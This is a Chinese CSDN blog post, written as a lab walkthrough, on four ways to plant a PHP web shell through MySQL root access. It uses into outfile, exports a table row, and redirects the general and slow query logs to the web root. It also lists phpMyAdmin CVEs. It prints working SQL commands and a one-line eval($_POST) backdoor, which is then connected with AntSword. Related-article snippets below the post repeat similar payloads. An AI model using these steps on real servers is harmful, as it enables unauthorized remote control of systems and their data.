Mysql写shell的几种方式

最新推荐文章于 2024-11-12 21:42:05 发布
最新推荐文章于 2024-11-12 21:42:05 发布
阅读量8.3k 收藏 21
点赞数 6
分类专栏: 笔记 文章标签: mysql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Redredredfish/article/details/119864263
版权
本文详细介绍了如何利用MySQL的查询语句在不同场景下写入Shell,包括通过 outfile、插入数据并导出、开启全局日志和慢查询日志等方法,并演示了如何绕过 secure_file_priv 限制。最终成功在目标服务器上创建并连接到shell.php文件。
摘要由CSDN通过智能技术生成

Mysql写shell的几种方式

当我们拿到数据库权限时,可通过数据库管理工具写入shell到目标服务器上,利用shell控制目标服务器。

复现环境:
phpstudy_pro 8.1.0.6
mysql 5.7.26 root权限
网站绝对路径为D:\phpstudy_pro\WWW

利用方式:

  1. 通过outfile写入shell
    尝试通过outfile写入文件
 报错[Code: 1290, SQL State: HY000]The MySQL server is running with the –secure-file-priv option so it cannot execute this statement

百度之后找到原因:mysql 5.6.34版本以后 secure_file_priv的值默认为NULL,限制无法导入和导出文件

解决办法:在my.ini配置文件[mysqld]下添加secure_file_priv =""使其默认为空
在这里插入图片描述

新建查询select

'<?php  @eval($_POST[1]);?>' into outfile
'D:/phpstudy_pro/WWW/shell.php';,成功写入shell.php文件

在这里插入图片描述
蚁剑连接http://localhost:122/shell.php成功
在这里插入图片描述

  1. 向表插入shell并查询导出
    将一句话木马作为数据插入test1表username字段中
 insert into`test1`(`username`) values ('<?php  @eval($_POST[1]);?>');

在这里插入图片描述
在这里插入图片描述

查询该数据并导出到shell.php

   select username from test1 into outfile 'D:/phpstudy_pro/WWW/shell.php';

在这里插入图片描述

蚁剑连接http://localhost:122/shell.php成功
在这里插入图片描述

  1. 开启全局日志写入shell
    首先查看全局日志是否开启
 show variables like '%general%';

如图所示general_log=OFF全局日志未开启
在这里插入图片描述

   开启全局日志 
   set global general_log = on; 
   将全局日志路径设置为shell文件路径 
   set global general_log_file = 'D:/phpstudy_pro/WWW/shell.php';

在这里插入图片描述

新建查询select '<?php  @eval($_POST[1]);?>';

mysql会将执行的语句记录到全局日志,从而将shell写入网站目录

在这里插入图片描述
蚁剑连接成功

  1. 慢查询日志写入shell
    由于在mysql>5.6.34中,secure_file_priv会阻拦我们使用outfile写入文件,没有服务器权限无法修改my.ini配置文件,可以利用慢查询日志写入shell,原理和利用全局日志差不多。

    首先一样查看慢查询日志是否开启

show variables like '%slow_query_log%';

在这里插入图片描述

开启慢查询日志并修改日志文件的绝对路径

在这里插入图片描述

使用慢查询日志时,只有当查询时间超过系统时间时才会记录在日志中

查询mysql系统时间 show global variables like '%long_query_time%';

在这里插入图片描述

向日志中写入shell

select '<?php @eval($_POST[1]);?>' or sleep(11);设置查询时间为11s

在这里插入图片描述
执行成功
在这里插入图片描述
蚁剑连接成功

  1. phpMyAdmin文件包含漏洞
    CVE-2018-19968
    CVE-2018-12613
    CVE-2016-5734
    CVE-2014-8959
mysqlShell小技巧_mysqlshell几种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
06-21 504
1.Mysql数据库支持union的时候文件小技巧: 采用常规的union入,可以看到前面的字段占位数肯定也会被入,替换成null也是一样的结果,这个对于shell没啥大碍,mysqlShell小技巧,但是如果用来bat,mof,vbs等文件就会出问题了,那么怎么去掉这个只入我们需要的内容呢?采用hex编码就好了。
mysqlshell_基于mysql下的几种shell方法
weixin_35212670的博客
01-18 2975
0x00关于mysql下的shell方法网上基本很多了,我原本也没打算总结总结的,毕竟网上已经很多了,不过在看 kilon 大佬的博客的时候,给我的感受就是明明一个几句话的东西,总能详细的,有条有理的记录下来,所以也正是如此,才有了这篇文章。0x01利用条件数据库当前用户为root权限知道当前网站的绝对路径PHP的GPC为 off状态入的那个路径存在入权限0x02基于联合查询法下的两个入方...
MySQL Shell教程
最新发布
Evan's Blog ٩(๑❛ᴗ❛๑)۶
11-12 2031
MySQL ShellMySQL的高级客户端和代码编辑器。它除了基本的SQL功能外,还提供一套使用Javascript和Python的API去管理MySQL。能使用它提供的XDevAPI操作MySQL 8.0提供的关系型数据库和文档数据库,还可以使用AdminAPI管理InnoDB集群。
通过MySQL入webshell几种方式(小宇特详解)
小宇的web博客
08-07 6226
通过MySQL入webshell几种方式 -01-通过outfileshell 利用条件 1.root权限2.网站的绝对路径且具有入权限,能够使用into outfile和into dumpfile来进行入。 这里用了以下的shell union select 1,"<?php eval($_REQUEST[8])?>" into outfile 'C:/phpStudy/WWW/4448.php' 这里连接蚁剑 -02-将shell入表中 利用条件 1.root权限2.网站
MYSQLshell
weixin_30412167的博客
07-04 672
利用需要满足以下条件: root权限 GPC关闭(能使用单引号) 有绝对路径(读文件可以不用,文件必须) 没有配置–secure-file-priv 成功条件:有读的权限,有create、insert、select的权限 Drop TABLE IF EXISTS temp;//如果存在temp就删掉Create TABLE temp(cmd text NOT NULL);...
mysqlshell
weixin_47385895的博客
08-22 2046
mysql常见shell方法
mysqlshell小技巧
weixin_30595035的博客
06-19 232
set global general_log=on;set @file=0x653A2F2F7777772F2F782E706870;set global general_log_file=@file;set global general_log=off; 转载于:https://www.cnblogs.com/websecyw/p/9200468.html
mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1504
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
Shell脚本中执行sql语句操作mysql的5种方法
01-10
本文描述了在Linux环境下mysql数据库中,shell脚本下调用sql语句的几种方法,供大家参考。对于脚本输出的结果美化,需要进一步完善和调整。以下为具体的示例及其方法。 1、将SQL语句直接嵌入到shell脚本文件中 代码...
mysql root拿shell_mysql几种获取shell和提权的方式
weixin_42557537的博客
02-26 691
♥喜欢请点个赞吧♥mysql outfile导出webshell条件:知道物理路径,root权限,同时mysql需要有write权限,secure_file_priv配置不为null,查看方法:show global variables like '%secure_file_priv%';这个参数只能通过修改配置文件后重启mysql修改。1.select '' into outfile 'C:ph...
mysqlshell,mysql多语句shell
weixin_39760919的博客
03-23 107
mysql> use xssdb;Database changedmysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D2...
MySQLShell方法总结
李火火的安全圈
12-31 4951
MySQL注入点,用工具对目标站点入一句话shell,需要哪些前提条件? **root权限以及网站的绝对路径** outfile 和 dumpfile Shell 利用条件 ·数据库当前用户为root权限 ·知道当前网站的绝对路径 ·PHP的GPC为OFF状态;(魔术引号,GET、POST、COOKIE) `入的那个路径要有入权限 过滤了单引号into outfile 还可以用吗 不能,GPC要OFF才行,可以测试Hex编码 基于UNION联合查询 ?id=1 UNION ALL SELECT
Mysql数据库——Shell脚本
一坨小橙子的博客
03-23 512
数据库Shell脚本(向数据库输入数据、格式化输出数据、连接数据库并发送命令)
shell 实现mysql入操作
afei2530的博客
07-06 469
mysql -uroot study -proot << EOF > insert into top_n_movie(movie,sumprice)values('hello kitty',100);> EOF 一定要换行 shell 实现mysql入操作 shell语句查询mysql数据库的常用方法 转载于:https://www.cnblogs...
Shell脚本——MySQL
m0_57021623的博客
03-16 1900
​## 向数据库中插入数据。
MySQLshell的问题
m0_62207482的博客
03-20 701
disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_ope n,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source`,但是可 以用dl扩展执行命令或者ImageMagick漏洞。secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出Mysql>=5.5.53 默认为NULL,即默认禁止导入导出。
mysql_mysql多语句shell
weixin_30312037的博客
02-01 108
mysql> use xssdb;Database changedmysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D2...
Mysql 后台日志shell(root权限)
haoge1998的博客
04-15 1978
Mysql shell 一、后台日志shell 前提: 需要有root权限 outfile被禁止 文件入被拦截 1、查看配置 是否开启日志 日志入路径 show variables like '%general%'; 2、开启general log模式为on set global general_log = on; 3、设置目录为shell地址 set global general_log_file = '/var/www/html'; 4、shell select '<?
Mysql数据库getshell方法
weixin_68408599的博客
04-02 2161
今天摸鱼时候,突然有人问我不同的数据库getshell方式,一时间我想到了mysql还有redis未授权访问到getshell方式,但是仅仅第一时间只想到了这两种,我有查了查资料,找到了上面两种数据库getshell的补充,以及其他数据库getshell方式。因此更新一个专栏,各个数据库getshell方式
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Redredredfish

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值